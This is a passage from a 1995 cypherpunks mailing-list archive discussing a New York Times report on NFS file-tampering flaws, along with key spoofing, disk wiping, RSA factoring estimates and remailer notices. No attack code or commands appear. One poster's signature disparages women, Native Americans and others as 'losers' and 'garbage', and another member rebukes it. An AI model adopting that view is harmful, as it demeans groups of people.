>   computer users. He criticized makers of hardware and
>   software for not moving more quickly to make easy-to-use
>   security features a built-in part of the technology used on
>   the Internet.
>
>   "The people who should be the leaders in offering security
>   have been too busy counting their money to build these
>   features in to their products," Mr. Schiller said.
>
>   Some commercial Internet merchants have tended to play down
>   the potential for harm from an illegal interception of
>   credit card information over the Internet. They point out
>   that consumers routinely make their credit card numbers
>   available in transactions done by mail or telephone and
>   that the law puts limits on a consumer's liability in cases
>   of credit card fraud.
>
>   But Mr. Brewer, the Berkeley professor, said that the
>   crucial difference in the proposed Internet commerce
>   systems was that for the first time it would be relatively
>   simple for a criminal to collect hundreds or thousands of
>   credit card numbers. Then a thief could use each credit
>   card only one time, making detection much more difficult.
>
>   Sensitive to heightened concerns about security, Wells
>   Fargo, the large California bank, which earlier this year
>   began permitting customers with personal computers to view
>   their account information with the Netscape software,
>   suspended the service in September after the Berkeley
>   students reported the flaw in Netscape.
>
>   After Netscape followed with an improved version of its
>   software, Wells Fargo officials found it secure enough that
>   they planned to resume the service later this week. The
>   bank will, however, require customers to use the corrected
>   version of the Netscape program.
>
>   Even then. Wells Fargo customers will be able only to view
>   account balances and other information, but not transfer
>   money or conduct other transactions of the type that might
>   leave them vulnerable to the Internet NFS weakness.
>
>   "We still hope to be able to offer transactional
>   capabilities next year, but this has slowed us down a
>   little bit," said Lorna Doubet, a Wells Fargo spokeswoman.
>   "Many of our customers feel that security is absolutely
>   essential and we have to be cautious in this regard."
>             
>   Executives at Netscape said yesterday that they were aware
>   of the security issues surrounding NFS and would make
>   changes in the next release of their software expected
>   before the end of the year to permit a recipient of a
>   downloaded program to check it for signs of tampering.
>
>   And hoping to take advantage of the fault-finding talents
>   of the Berkeley researchers and other like-minded software
>   experts, the company announced a contest today called
>   Netscape Bugs Bounty, in which Netscape will award prizes
>   to users who find bugs or security loopholes in its
>   software.
>
>   Some Internet experts said they expected that many security
>   weaknesses like the one the Berkeley group had demonstrated
>   would be found, because the Internet was simply not
>   designed to insure secure commerce.
>
>   "Imagine a walled town or a house," said Noel Chiappa, a
>   member of the Internet Engineering Task Force, a
>   standards-setting group. "It doesn't matter if 99 windows
>   are tight as can be -- if the 100th is wide open, the bad
>   guys will bypass your security. "
>
>   [End]
>
>
>
>
>
>
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Oct 95 07:44:35 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Man in the Middle Revisited (but not for the last time)
Message-ID: <199510111443.KAA04261@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 AM 10/11/95 -0700, Timothy C. May wrote:

>Nope. au contraire, negatory. I *do not* care if the entity calling itself
>"Hal Finney" is being surrounded by an MITM. Only "Hal Finney the Key" can
>read messages I encrypt to the public key I got from him long ago, so if
>the "Hal + MITM" can do so, they are effectively one and the same.

Not a new problem BTW as in the old joke:  "The Iliad wasn't written by
Homer but by another guy of the same name."

For the non-classically inclined, this is a joke because we don't really
know anything about Homer anyway.  Maybe he was a blind poet.  Maybe he
never existed.

DCF

"Who wonders why his local B&N StuporStore has 1/2 of one section of one
shelf unit dedicated to classics and shelf unit upon shelf unit dedicated to
the gender-disabled, to women, to native americans, to new age mysticism,
and other garbage.  Particularly since those interest areas represent the
losers.  Who's interested in losers?  (We know they're losers BTW because
we're *reading* about them in a capitalist store.  If they'd won there'd be
no reading and no store."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Oct 95 10:37:27 PDT
To: cypherpunks@toad.com
Subject: "Denial of Clueless Service" Attacks
Message-ID: <aca14dba17021004a0b6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 PM 10/11/95, Anonymous wrote:
>> Two years ago, I pointed out that getting a single message past
>> the man in the middle isn't good enough; you have to convince your
>> readers that the key they received on one channel is more accurate
>> than the key they're receiving on all the other channels.
>> But if they'll believe that, they may also believe the man in the middle's
>> announcement that the key in your name on all the keyservers is
>> wrong, and the correct key is the one he's putting out.
>> Can't win either way, but it's still important to get the key out.
>>
>> My current key is 0x54696D4D; the fingerprint is
>> 4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.
>
>but this is not Tim May's key, his key is:
>
>pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
>          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28
>
>
>And this one is signed by these people:
>
>pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
>sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
>sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
....

Indeed, this is not an effective MITM attack. The spoofer certainly cannot
read messages encrypted to my public key (though he can read messages
encrypted to the public key offered above in his message...not a new
situation). And he cannot sign messages that others can match to the keys I
gave them, or that got put into the web of trust.

So, what is it? Is it a "denial of service" attack? Not really.

It's a "denial of clueless service" attack, in that anyone who tries to use
that key and then send me stuff gets to have their stuff _thrown away_,
which is always helpful in the war against cluelessness. Good riddance.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Berger <dvberger@eit.COM>
Date: Wed, 11 Oct 95 11:05:04 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Internet Flaws
Message-ID: <199510111812.LAA21331@viper.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


Just read through the stack of news this was based on (comp.security.unix)

The Berkeley folks rightly point out that if I trust an NFS to send me a
binary, then an interaction with the server sans authentication/encryption
can leave me with a compromised binary.  This is valid when I get my binary
from out on the net.  This seems much less valid when I live behind a
firewall and trust my fellow workers who have access to the server, the
wires coming out of my cube, and my whole machine for that matter.

As a result, the only thing I think this article should say is that we need
secure ftp.  Isn't this being worked on?

As for the article - 9/10 scaring people, 1/10 semi-fact.  Be serious?  NFS
is not the basic structure of the Internet.  I'm embarrassed that an article
so weak in its explanations and so high on fluff appeared on the front page
of a well respected newspaper.

Dave

-----the article for reread-------

>   The New York Times, October 11, 1995, pp. A1, D3.
>
>   [Page One]
>
>   Discovery of lnternet Flaws Is Setback for On-Line Trade
>
>   By John Markoff
>
>
>   San Francisco, Oct. 10 -- Newly publicized weaknesses in
>   the basic structure of the Internet indicate that the
>   worldwide computer network may need a time-consuming
>   redesign before it can be safely used as a commercial
>   medium.
>
>   The flaws could allow an eavesdropper or criminal to divert
>   many types of documents or software programs traveling over
>   the Internet, examine or copy or alter them, and then pass
>   them on to the intended recipient -- who would have no easy
>   way of knowing that the files had been waylaid. Not only
>   could electronic mail be read in transit or credit card
>   numbers be copied en route, but special security techniques
>   meant to protect such transactions could be dismantled
>   without the user's knowledge.
>
>   That such security flaws exist is not surprising in a
>   system designed originally as a scientific experiment. But
>   the recent rush to the Internet by companies seeking to
>   exploit its commercial possibilities has obscured the fact
>   that giving the system a new purpose has unearthed
>   fundamental problems that could well put off true
>   commercial viability for years.
>
>   "Companies would have you believe this is a trivial
>   problem," said Eric Brewer, a professor of computer science
>   at the University of California at Berkeley. "But now there
>   is a financiat incentive to exploit these flaws and to do
>   it secretly."
>
>   The problems were described in a posting that researchers
>   at the university made on Monday to several on-line
>   discussion groups. While the discussion groups are intended
>   for computer security experts, they are potentially
>   accessible to millions of Internet users -- including
>   break-in artists, who are known to monitor such discussion
>   groups for tips on new ways to crack computer systems.
>
>   The researchers who described the Internet weaknesses
>   include two Berkeley computer science graduate students who
>   noted a security weakness in a popular Netscape
>   Communications Corporation software program last month.
>   Then as now, the students' stated motivation in publicizing
>   the problems was to underscore vulnerabilities facing all
>   companies and customers wishing to use the Internet for
>   commerce.
>
>   When the Netscape problems were disclosed last month, the
>   company said the security flaws would be corrected in the
>   next version of its software, which users would be able to
>   download at no charge from Netscape's Internet site. But
>   the newly publicized flaws in the Internet itself indicate
>   that even if a user downloaded a copy of the new, improved
>   Netscape program, a criminal could tamper with the copy
>   along the way and make it unsafe for use in credit card
>   transactions.
>
>   The problem is not Netscape's alone; it potentially affects
>   any organization that operates a computer from which files
>   or software could be downloaded over the Internet. The
>   weakness can be traced to the technical underpinnings of
>   the network, which was set up more than a quarter-century
>   ago not as a medium for conducting business but as a way
>   for academic and scientific researchers to exchange
>   information.
>
>   The disclosure of the flaws casts doubt on the aspirations
>   of companies like Netscape, which last summer had one of
>   the most successful stock offerings in Wall Street history
>   based on the promise of the impending arrival of a
>   full-fledged on-line marketplace.
>
>   "Companies should take a step back and think about this a
>   little more," said Ian Goldberg, one of the Berkeley
>   students. "If it takes a bit longer but comes out more
>   secure, we will all be better off in the long run."
>
>   The way many Internet systems are set up -- especially the
>   Internet's increasingly popular World Wide Web service in
>   which software images and even video and audio clips can be
>   easily downloaded -- information is stored on a computer
>   called a file server and then transferred to a user's
>   computer when it is needed.
>
>   The newly publicized weakness occurs in a widely used
>   Internet protocol -- or technical standard -- known as the
>   Network File System, or NFS. Because NFS does not have any
>   means for allowing the recipient of a program or document
>   to verify that it has not been altered during transmission
>   from the file server to the user, any interception or
>   tampering would go undetected.
>
>   "The Internet protocols have been insecure since day one,"
>   said Jeffrey I. Schiller, the manager of computer networks
>   at the Massachusetts Institute of Technology and director
>   of an industry task force that is trying to design a new
>   secure version of the Internet.
>
>   But the group's timetable is uncertain, and even when it
>   does have recommendations ready, Mr. Schiller is not
>   optimistic that the industry will be willing to devote the
>   time and money to put them into effect.
>
>   He said that many technologies already exist for improving
>   commercial security on the Internet, but many of them
>   require too much technical sophistication on the part of
>   computer users. He criticized makers of hardware and
>   software for not moving more quickly to make easy-to-use
>   security features a built-in part of the technology used on
>   the Internet.
>
>   "The people who should be the leaders in offering security
>   have been too busy counting their money to build these
>   features in to their products," Mr. Schiller said.
>
>   Some commercial Internet merchants have tended to play down
>   the potential for harm from an illegal interception of
>   credit card information over the Internet. They point out
>   that consumers routinely make their credit card numbers
>   available in transactions done by mail or telephone and
>   that the law puts limits on a consumer's liability in cases
>   of credit card fraud.
>
>   But Mr. Brewer, the Berkeley professor, said that the
>   crucial difference in the proposed Internet commerce
>   systems was that for the first time it would be relatively
>   simple for a criminal to collect hundreds or thousands of
>   credit card numbers. Then a thief could use each credit
>   card only one time, making detection much more difficult.
>
>   Sensitive to heightened concerns about security, Wells
>   Fargo, the large California bank, which earlier this year
>   began permitting customers with personal computers to view
>   their account information with the Netscape software,
>   suspended the service in September after the Berkeley
>   students reported the flaw in Netscape.
>
>   After Netscape followed with an improved version of its
>   software, Wells Fargo officials found it secure enough that
>   they planned to resume the service later this week. The
>   bank will, however, require customers to use the corrected
>   version of the Netscape program.
>
>   Even then. Wells Fargo customers will be able only to view
>   account balances and other information, but not transfer
>   money or conduct other transactions of the type that might
>   leave them vulnerable to the Internet NFS weakness.
>
>   "We still hope to be able to offer transactional
>   capabilities next year, but this has slowed us down a
>   little bit," said Lorna Doubet, a Wells Fargo spokeswoman.
>   "Many of our customers feel that security is absolutely
>   essential and we have to be cautious in this regard."
>             
>   Executives at Netscape said yesterday that they were aware
>   of the security issues surrounding NFS and would make
>   changes in the next release of their software expected
>   before the end of the year to permit a recipient of a
>   downloaded program to check it for signs of tampering.
>
>   And hoping to take advantage of the fault-finding talents
>   of the Berkeley researchers and other like-minded software
>   experts, the company announced a contest today called
>   Netscape Bugs Bounty, in which Netscape will award prizes
>   to users who find bugs or security loopholes in its
>   software.
>
>   Some Internet experts said they expected that many security
>   weaknesses like the one the Berkeley group had demonstrated
>   would be found, because the Internet was simply not
>   designed to insure secure commerce.
>
>   "Imagine a walled town or a house," said Noel Chiappa, a
>   member of the Internet Engineering Task Force, a
>   standards-setting group. "It doesn't matter if 99 windows
>   are tight as can be -- if the 100th is wide open, the bad
>   guys will bypass your security. "
>
>   [End]
>
>
>
>
>
>
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 11 Oct 95 08:21:08 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Man in the Middle Revisited (but not for the last time)
In-Reply-To: <199510111443.KAA04261@panix.com>
Message-ID: <199510111520.LAA15537@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
> DCF
> 
> "Who wonders why his local B&N StuporStore has 1/2 of one section of one
> shelf unit dedicated to classics and shelf unit upon shelf unit dedicated to
> the gender-disabled, to women, to native americans, to new age mysticism,
> and other garbage.  Particularly since those interest areas represent the
> losers.  Who's interested in losers?  (We know they're losers BTW because
> we're *reading* about them in a capitalist store.  If they'd won there'd be
> no reading and no store."

This signature was:
	* completely off-topic by any stretch of the imagination
	* longer than the rest of the message
	* flamebait

Detweiler's rants are at least usually vaguely relevant to crypto & privacy.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 10 Oct 95 18:38:29 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PC disk wipe software
In-Reply-To: <199510092220.SAA19341@book.hks.net>
Message-ID: <199510110137.LAA11056@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and shamrock@netcom.com (Lucky Green)

> In article <199510091318.JAA24166@jekyll.piermont.com>, perry@piermont.com
> ("Perry E. Metzger") wrote:
 
[asking for utility to wipe data from MS-DOS hard drive]
 
shamrock@netcom.com (Lucky Green) answered:

...
> They all invariably fail to wipe the slackspace at the end of
> allocated, but not fully used blocks. Consequently, several kB of data
...

Since nobody seemed to mention it: I suspect that most of them also
fail to wipe already reallocated space.

Think about it: some of that space was only overwritten once...

So to be safe I guess make a backup (with a backup utility that doesn't
copy slackspace), wipe the disk, then restore. Also beware programs that
do not properly zero their files when allocating them.

The cliche answer to the original question, I believe, is:
  yes, go to the hardware store and ask for a 'sledgehammer'.


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHsf0SxV6mvvBgf5AQGMmgP9GJvJgWmdW3YHRCfNRKQtlM557MIrzn+t
ZDbiSp/E7hKXPDf7Ech/O7hzdFvCCA7APR4lE9bIimP8mFuE5KAKTLIC2cYnG6Hi
Cj28OorVS/mDtwMOJJ6TJLV8tXArDtvAKY9OOghzepZs9hf9b5lXs6PXWEd7gb6F
LinHs36C4dI=
=0vcL
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 11:48:11 PDT
To: cypherpunks@toad.com
Subject: On export restrictions and the NYT/Internet Commerece
Message-ID: <199510111842.LAA14299@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The recent NYT article about the NFS work (nominally about the
NFS work, I wouldn't call "spoofing NFS" to be tantamount to being
able to spoof any file xfer over the internet) stresses that the
internet wasn't built for security, yadd yadda yadda and therefore
isn't very useful for internet commerce at this point.

	I urge everyone who talks to the media about this to stress
export restrictions.. The infrastructure *would* be in place by now if
we didn't have export restrictions. Deployed encryption at the IP
level would be much easier if we didn't have export restrictions,
etc. etc.

	Now that the potential for big bucks are obviously on the line
maybe, (They always were on the line, it is just more obvious
now) just maybe, enogh large corporations will invest in lobbying for
the removal of export restrictions that it will get done.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Wed, 11 Oct 95 11:54:03 PDT
To: John Gilmore <cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199510111853.OAA26654@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 PM 9/28/95 -0700, John Gilmore wrote:
>Forwarded-by: gordoni@base.com (Gordon Irlam)

>SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
>director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
>General Max Thurman, commander of the Panama Invasion. Recently departed
>board members include Robert Gates, former CIA director; William Perry,
>current Secretary of Defense; and John Deutch, the current CIA director.
>Current SAIC government contracts include re-engineering information systems
>at the Pentagon, automation of the FBI's computerized fingerprint
>identification system, and building a national criminal history information
>system.

   I am not supporting the idea that SAIC is not annother govt mouthpiece or
cover op but it is standard practice to hire retired workers from government
that worked in the area that you want to sell services into.

   I know of a ex army colonel that used to work for a government
contractor.  I'm sure that he used his contacts to sell services to the
government.  You gotta love it!

Don't trust S/MIME, it's supported by RSA (a govt mouth piece) and uses DES.

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Wed, 11 Oct 95 01:56:16 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix POTP
In-Reply-To: <199510102120.RAA110954@tequesta.gate.net>
Message-ID: <MAPI.Id.0016.00617269204c61693835434230303437@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain


> Unfortunately, and we really mean unfortunately, we can only reveal what 
>"it is" to people who agree to a non-disclosure arrangement while we're 
>patent pending. Otherwise we would have no problem revealing the whole 
>method. So far, every international expert who has reviewed the method 
>agrees (after many, many hours and days of trying to find holes) that POTP 
>really does what we say it does.

Maybe you could name those experts who have inspected it - thanks.


Kari




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 11 Oct 95 08:59:53 PDT
To: John Lull <lull@acm.org>
Subject: Re: java security concerns
In-Reply-To: <199510101714.KAA07329@ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951011115859.16896C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, John Lull wrote:

> Pardon my French, but if your lawyers make it impossible to do
> technical work correctly, isn't it time to get new lawyers?  I can't
> see how offering a reward for reporting bugs could possibly be
> objectionable to any rational lawyer.

I agree; I sent private mail to the parties saying in effect "if your 
lawyer can't structure this, it's time to get a new lawyer."

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 11 Oct 95 12:08:00 PDT
To: pjb@ny.ubs.com (Paul J. Bell)
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <v02110103aca1c480b5a8@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>A fine piece of work.  The ideas expressed in this paper should scare
>the hell out of everyone who uses NFS for any serious applications,
>which for a fact includes most banks and all investment banks and
>brokage houses.  In this particular area I KNOW what is at risk.
>Again, I congratulate the authors on a first-class effort.
>
>

The real issue is not NFS itself but RPC and the interface layer between
the system and these layered services. In fact holes also exist in RLOGIN,
REXEC, and RSH (ports 512,513, and 514).

Cant tell you how many secure systems we have broken because of these
little goodies.

The real issue is that by itself TCP/IP has no security to speak of, and
more importantly the concept of secure messaging goes much farther than
just keeping prying eye's off the data contained within. For instance
Commerce Models require synchonization of process events in order to manage
OLTP properly. TCP/IP in and of itself is really unusable for these tasks
without something like the ISIS messageing protocol and process control
1interface above the protocol stack.

All in all it's a complex nut to crack.

Todd

cheers,
>    paul
>
>> From owner-cypherpunks@toad.com Tue Oct 10 03:15:15 1995
>> From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
>> To: cypherpunks@toad.com, bugtraq@crimelab.com
>> Cc: gauthier@cs.Berkeley.EDU, brewer@cs.Berkeley.EDU, iang@cs.Berkeley.EDU,
>>         daw@cs.Berkeley.EDU, fur@netscape.com
>> Subject: Basic Flaws in Internet Security and Commerce
>> Date: Mon, 09 Oct 1995 14:26:06 -0700
>> Sender: owner-cypherpunks@toad.com
>> Content-Length: 10235
>>

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Oct 95 05:04:05 PDT
To: cypherpunks@toad.com
Subject: Open Mkt Sudden Infant Death
Message-ID: <199510111203.NAA20811@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Open Market Web Site Launches Free "Internet Security" 


Cambridge, MA, Oct 10  -- In a teleconference, Open
Market launched a three-pronged attack on Internet
"security breaches" that includes an online "security
checker" for multivendor Web browsers belonging to end
users, free upgrades from the Netscape Secure Server to
the Open Market's Secure WebServer, and the giveaway of
sample code to operators of "any extensible secure Web
server."

The trio of security remedies will all be available free
of charge starting this week from the Open Market Web
site at <http://www.openmarket.com>, officials reported
during the teleconference.

"Our entire business is based on people having trust in
open networks," noted Shikhar Ghosh, Open Market's chief
executive officer (CEO). "We'll make a significant
investment, with the view that all of will suffer if (the
public) loses trust."

Consumers are only "gradually gaining some confidence" in
the Internet, according to Ghosh. But recently, reports
have surfaced of security problems with the Netscape
Secure Server, and some Web sites using the Netscape
product have been "saying they are going to go off the
air."

As a result, he added, Open Market is introducing a
policy that allows licensed users of the Netscape Secure
Server to download Open Market's Secure WebServer "at no
cost."

The other two planks in Open Market's new pro-security
Web "resource center" are "informational," the
journalists and analysts were told. Open Market will work
with the makers of Web browsers to track information on
"known problems" with browsers, including browser
tampering. "We will (also) inform the (Web) software
companies of problems," the CEO maintained.

The Open Market Web site will perform a database look-up
on the type of browser in use, and will then report back
to the user on any security issues known to be associated
with that kind of browser, elaborated Open Market's Win
Treese.

"One strength we have is that we don't have a browser. We
are agnostic," Ghosh told the telephone audience. Open
Market also performs "extensive testing" on Web browsers.
"We do as many as several hundred versions of browsers
coming in at any time. We definitely expect (to) unite
the industry, rather than dividing the industry," he
added.

The sample code to be offered from the Open Market Web
site will provide "underlying code" for "reference
implementations on what are the major ways of handling
the known (Internet security) problems," according to
Ghosh.

"To reiterate, security is one of those pillars on which
the entire industry rests," contended the Open Market
chief, to conclude the teleconference.

Contact: Open Market, 617-621-9500; Press Contacts: Wendy
Ziner, Open Market, 617-374-6508; Dawn Geary or Merrill
Freund, Schwartz Communications for Open Market,
617-431-0770)

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goldberg@mars.superlink.net
Date: Wed, 11 Oct 95 10:19:33 PDT
To: cypherpunks@toad.com
Subject: Re: Internet, the cracking machine
Message-ID: <199510111722.NAA16839@mars.superlink.net>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
>factor RSA keys of bit
>512: 20 minutes
>768: 50 days
>1024: 100 years
>2048: 1e11 years
>
>If you are reading this from an archive, divide the brute force numbers by
>4**(your current year-1995), and the factoring numbers by 8**(your current
>year-1995), for a factor of 2 improvement per year in each of the
>following: average CPU power, number of computers on the Internet, and
>factoring algorithm. 

BUT, one must remember that the power of 2 increase is going on during the
100 years effort to break the 1024 bit case, so, by these assumptions, the
1024 bit key will break sometime in the 6th year! 

Fred G.
Jon Goldberg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 11 Oct 95 10:26:30 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510111604.AA06660@cantina.verity.com>
Message-ID: <9510111723.AA17966@all.net>
MIME-Version: 1.0
Content-Type: text


> I'd love to see something in there about most commercial sites being behind
> firewalls without nfs access across the firewall.  This greatly reduces the
> risk from the nfs problems.  If you get your binary via nfs from a trusted
> host inaccessible from the internet, then if you have this problem management
> can handle it as an employee problem;)  There are ways to make secure
> firewalls, it's fairly well understood.  Sometimes people point to things
> like the hack Mitnick did last Christmas, but his attack took advantage of
> a couple of things a security expert shouldn't have allowed, first and
> foremost two machines were accesible from the internet, and one of them
> trusted root logins from the other without a password:(
> 
> I could write something up about it if you'd like.

You might want to refer the NYT to the recent study published by
Computer Security Institute (in info-sec super journal on our W3 site).

There are alse several papers there on "Internet Holes" under Network
Security in the same on-line journal.  Every month, another 5-10 holes
are added to those published in this forum.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlm@skyrr.is (Magnus Logi Magnusson)
Date: Wed, 11 Oct 95 06:46:05 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510101920.PAA24628@panix.com>
Message-ID: <199510111345.AA046029137@hp001c.skyrr.is>
MIME-Version: 1.0
Content-Type: text


> My interest arises out of the new Pentium 120 that has come my way and the
> 40,000 keys/second it gets running the 32-bit version of the Brue code.
> Since my ISP is a local call, I might even be able to get away with an 8
> hour PPP session to try the WIN95 client.
> 
Im interested too... if there is a 32 bit client for NT/Win95 (or a single
thredded one for Win32s) capable of reporting automatic to the
server/local server, I could probably throw in c.a. 40-50 pentiums and a
lot more 486 (and a few HP/Sun/Alpha) :-)  Anyone working on self-reporting
win32 client?

  Logi.

-- 
Magnus Logi Magnusson
System programmer, State and Municipal Data processing center, Iceland
E-mail: mlm@skyrr.is & mlm@rhi.hi.is




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@valhalla.phoenix.net>
Date: Wed, 11 Oct 95 11:47:06 PDT
To: cypherpunks@toad.com
Subject: IMPORTANT: Valhalla is leaving alias.net domain!!
Message-ID: <Pine.SUN.3.91.951011133632.262A-100000@valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


NOTICE: valhalla.phoenix.net is leaving the alias.net domain! Please
change your entries from remailer@spook.alias.net and
wmono@spook.alias.net to remailer@valhalla.phoenix.net and
wmono@valhalla.phoenix.net accordingly. Apparently double-domaining
valhalla in SunOS 4.1.3 causes severe DNS problems that I can't explain at
this time. I apologize for the inconvenience.

Raph, can you change the entry to your remailer list accordingly ASAP??

John Perry - KG5RG
perry@valhalla.phoenix.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Valhalla Remailer <remailer@valhalla.phoenix.net>
Date: Wed, 11 Oct 95 11:58:09 PDT
To: cypherpunks@toad.com
Subject: Updated Key for Valhalla
Message-ID: <Pine.SUN.3.91.951011135442.673A-100000@valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



Here is the updated key for valhalla to reflect the new address.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy/NyuUAAAEEAMN2nGvBlrvgiJn+9H8rafUOIAySzwaDAHr0myS6/dGHscfe
1gZ2usnL9zUQyhLfziurvd4yDYmsLxofHtzZuzOlZmCwSnXDwdxaeJs4zw8JoQxU
OjPcxB/Ki1aNkKMhPuRezIFnWyMxOaiJTZeQmtMLhzgfgpL0xoqfP2eApTv5AAUR
tEBWYWxoYWxsYSBSZW1haWxlciBUeXBlLUkgUEdQIGtleSA8cmVtYWlsZXJAdmFs
aGFsbGEucGhvZW5peC5uZXQ+tDxOU0EgU3Bvb2sgUmVtYWlsZXIgVHlwZS1JIFBH
UCBrZXkgPHJlbWFpbGVyQHNwb29rLmFsaWFzLm5ldD4=
=3YjJ
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 11 Oct 95 11:01:18 PDT
To: David Murray <sdavidm@iconz.co.nz>
Subject: Re: Banque des Cypherpunks
In-Reply-To: <pnr828410657q@iconz.co.nz>
Message-ID: <Pine.SUN.3.91.951011135717.10037A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, David Murray wrote:

> A bank isn't going to last long if the SEC can just take its 'deposits'. 
> Fortunately there are still a number of jurisdictions left where the bank's
> bank account should be safe.

